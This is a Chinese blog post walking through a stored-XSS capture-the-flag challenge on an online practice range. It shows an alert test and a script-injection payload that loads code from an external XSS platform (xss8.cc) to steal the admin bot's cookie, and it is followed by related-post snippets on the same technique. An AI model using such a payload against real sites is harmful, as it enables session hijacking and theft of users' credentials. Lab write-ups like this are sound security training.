为了更多的权限,留言板

最新推荐文章于 2022-12-26 09:38:05 发布
最新推荐文章于 2022-12-26 09:38:05 发布
阅读量391 收藏
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55129870/article/details/124714289
版权

URL:封神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 (zkaq.cn)

 

 测试是否存在xss漏洞

<script>alert(1111)</script>

 成功弹窗,存在xss,由tips可知这题是一道存储型XSS偷取cookie的题目,既是存储型偷取cookie,就需要xss平台,找一个网上的xss平台,这里使用:XSS平台-XSS安全测试平台

(当管理员查看留言页面时触发xss,将管理员的cookie发送到该平台上面,从而实现利用管理员的cookie进行伪造目标权限。)

注册,登录

 创建一个项目

 项目名称、项目描述随意写

 下一步, 选择这两项。

复制</tExtArEa>'"><sCRiPt sRC=//xss8.cc/9Fj3></sCrIpT>到留言板

 

 因为xss bot 每10秒访问一次页面,相当于管理员每10秒看一次留言,触发一次xss代码,所以在10秒后,xss平台接收到了目标的cookie,在其中读取到了flag,点击项目内容

 勾选展开,在cookie中便可看到flag.

 

努力挣大钱
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS绕过(弹窗拿flag)
qq_48550824的博客
08-05 495
XSS简介及绕过方法介绍
了解一些xss漏洞绕过方式
贝隆的博客
02-05 1543
了解一些xss漏洞绕过方式
ctf xss利用_Web缓存利用分析(一)
weixin_39540178的博客
12-20 270
前言最近看到一些Web Cache方面的攻击,于是总结了一下,内容如下。背景知识Cache是一种经典的用空间换时间的做法,其应用场景非常广泛,而本篇文章的聚焦点仅在于Web领域上,对于DNS等基础设施的相关cache攻击,也不在此讨论。那么我们可以大致将Web Cache攻击分为2类:· User Browser Cache·Web Server Cache对于浏览器,我们知道在请求网...
封神台 第三章 为了多的权限留言板!(Cookie)
m0_65712192的博客
10-17 626
封神台 第三章 为了多的权限留言板!(Cookie)
第三章:为了多的权限留言板
m0_51195235的博客
12-26 614
第三章:为了多的权限留言板
基于Flask的留言板Demo
07-31
4. **主页滑动显示留言**:为了提升用户体验,留言板可能会采用动态加载或轮播的方式展示留言。这可能涉及到JavaScript和HTML5的`<marquee>`标签或CSS动画。Flask可以通过渲染模板,结合前端技术实现这一效果。 5. ...
lyb.rar_留言板
09-21
《构建与实现:简洁大方的“留言板”系统》 在信息技术高速发展的今天,各种互动交流平台层出不穷,其中,留言板作为一种简单而实用的交互工具,深受用户喜爱。它为用户提供了一个可以自由发表意见、提出问题或者...
bbs.rar_网络留言板
09-19
相较于早期的网络留言本,网络留言板通常具有丰富的功能和高的互动性,能够支持多个主题的讨论,提供集中和有序的信息反馈。 一、网络留言板的基本结构与功能 1. 主题分类:网络留言板将讨论内容按主题分类...
liuyan.zip_留言板制作
09-14
总的来说,“liuyan.zip_留言板制作”项目涵盖了Web开发的基础知识,包括前端交互、后端处理、数据库设计和安全防护等多个方面。通过实际操作,你不仅可以提升编程能力,还能对Web应用的全貌有深入的理解。希望这...
季风留言板 v1.2.zip
06-19
实际的“季风留言板 v1.2”可能包含多特色功能和定制化选项。如果需要详细的信息,通常需要解压文件查看源代码、文档或者安装程序。在部署和使用时,应遵循软件提供的安装指南,并注意版权和许可协议。
封神台 第三章:为了多的权限留言板!【配套课时:cookie伪造目标权限 实战演练】
06-14 2523
题目 Tips: 1、存储型Xss 2、flag在cookie里,格式为zkz{..},xss bot 每10秒访问一次页面 3、自建Xss平台源码:http://www.zkaq.org/?t/99.html 经过一番操作,尤里虽然进入到后台,窃窃自喜的他不满足于此,作为黑阔他要挑战曾经的自己,他要攻克之前失手的网站! 他重新浏览之前的网站,这时他突然发现了一个留言板功能。而留言板管理员是每天都会去查阅的。 尤里开始动手…… 1.进入留言的页面,测试弹窗 发现弹框显示1,注入点为主题 ...
【封神台】cookie伪造目标权限
00勇士王子的博客
11-17 664
题目 解题过程 访问网站,是一个留言板 先用普通的xss测试一下 成功弹窗,说明地处存在xss漏洞 选择一个在线的xss平台,创建项目后输入平台的xss代码(我随便在网上找了一个xss平台如下:https://xss8.cc) 原理就是当管理员查看留言页面时触发xss,将管理员的cookie发送到该平台上面,从而实现利用管理员的cookie进行伪造目标权限 因为xss bot 每10秒访问一次页面,相当于管理员每10秒看一次留言,触发一次xss代码,所以在10秒后,xss平台接收到了目标的coo
封神台靶场-第四章
Mr_helloword的博客
07-12 1438
第四章:为了多的权限! Tips: 1、存储型Xss 2、flag在cookie里,格式为zkz{…},xss bot 每10秒访问一次页面 3、自建Xss平台源码:http://www.zkaq.org/?t/99.html 登陆后根据提示要进行存储型xss注入。 这里我们可以借助一个xss平台xss平台没有的可以在这里注册 创建项目 2.选择模块我这里选择自己想要的模块 3.复制如下代码到可能存在注入的地方 4.随便填入留言板提交 5.回到xss平台发现收到xss注入反馈 fl
利用xss平台的payload输入留言即可获得flag
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-26 1634
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top:利用xss平台的payload输入留言即可获得flag categories: CTFHUB刷题 tags:利用xss平台的payload输入留言即可获得flag 网络安全,CTFHUB,CTFHUB------XSS 反射型xss题目 题目是xss反射型 xss反射型是将变量的值换成xss的payload flag在cookie中,利用xss平台进行获取flag 利用xss平台的payload输入留言
第三章:为了多的权限 留言板
m0_48294281的博客
12-31 1371
靶场学习心得,欢迎大家交流!
webug4.0之xss
good good study
04-26 4737
目录 一. 反射型xss 二. 存储型xss 一. 反射型xss 进入到页面如下。关于xss,传送门 -》XSS(跨站脚本攻击)原理与利用 1. 页面观察 我们注意输入框的id=1,当我们输入什么就在页面回显什么,所以我们有里有怀疑存在xss漏洞 2. 构建弹窗语句 3. 寻找flag 弹出cookie,flag也出来了 <script>alert(document.cookie)</script> 4. 提交flag fsdafasdfas
网络渗透测试实验三
qq_62623325的博客
11-24 962
网络渗透测试实验三
XSS留言板实现
极客剑寮
02-21 1258
XSS留言板实现 XSS 留言板实现-笔记 预备知识 XSS漏洞 XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS最...
渗透新手福利---xss到获取cookie入门级
HBohan的博客
07-10 378
CV 新手写第一次写不足还请大佬多多指教,图片上传太麻烦了有的图片上传的位置估计不对,还请大家多多海量 通过对Tips的读取我们明白了这题是一道存储型XSS偷取cookie的题目。(因为flag在cookie中,XSS BOT每10秒就带着有flag的cookie去访问查看留言的页面) 既然是存储型XSS,那么我们先用弹窗去尝试那么就开始插入 把能插的地方都放了一遍因为我们不知道哪里可以插入成功 然后提交 弹窗说明我们插入成功右击审查元素看看是哪里提交成功了 这里执行了我们的js脚本 接下来我们用.
php多用户留言板研究内容
最新发布
06-10
研究PHP多用户留言板的内容包括但不限于以下几个方面: 1. 前端页面设计:研究如何设计用户友好、美观、易用的前端页面,包括用户注册、登录、发布留言、回复留言和查看留言等功能。 2. 后端数据处理:研究如何处理用户数据的存储和管理、留言数据的存储和管理、用户登录验证和权限控制等。 3. 安全性:研究如何防范钓鱼、跨站脚本攻击和SQL注入等安全问题,保障用户数据的安全性。 4. 性能优化:研究如何优化程序性能,提高程序的响应速度,减少程序的资源占用,提高用户体验。 5. 用户交互体验:研究如何提高用户的交互体验,通过一些特定的设计和功能,让用户感受到好的交互效果。 总之,研究PHP多用户留言板的内容主要是从用户体验、安全性、性能优化等方面入手,通过不断的改进和优化,提高留言板的实用性和用户满意度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值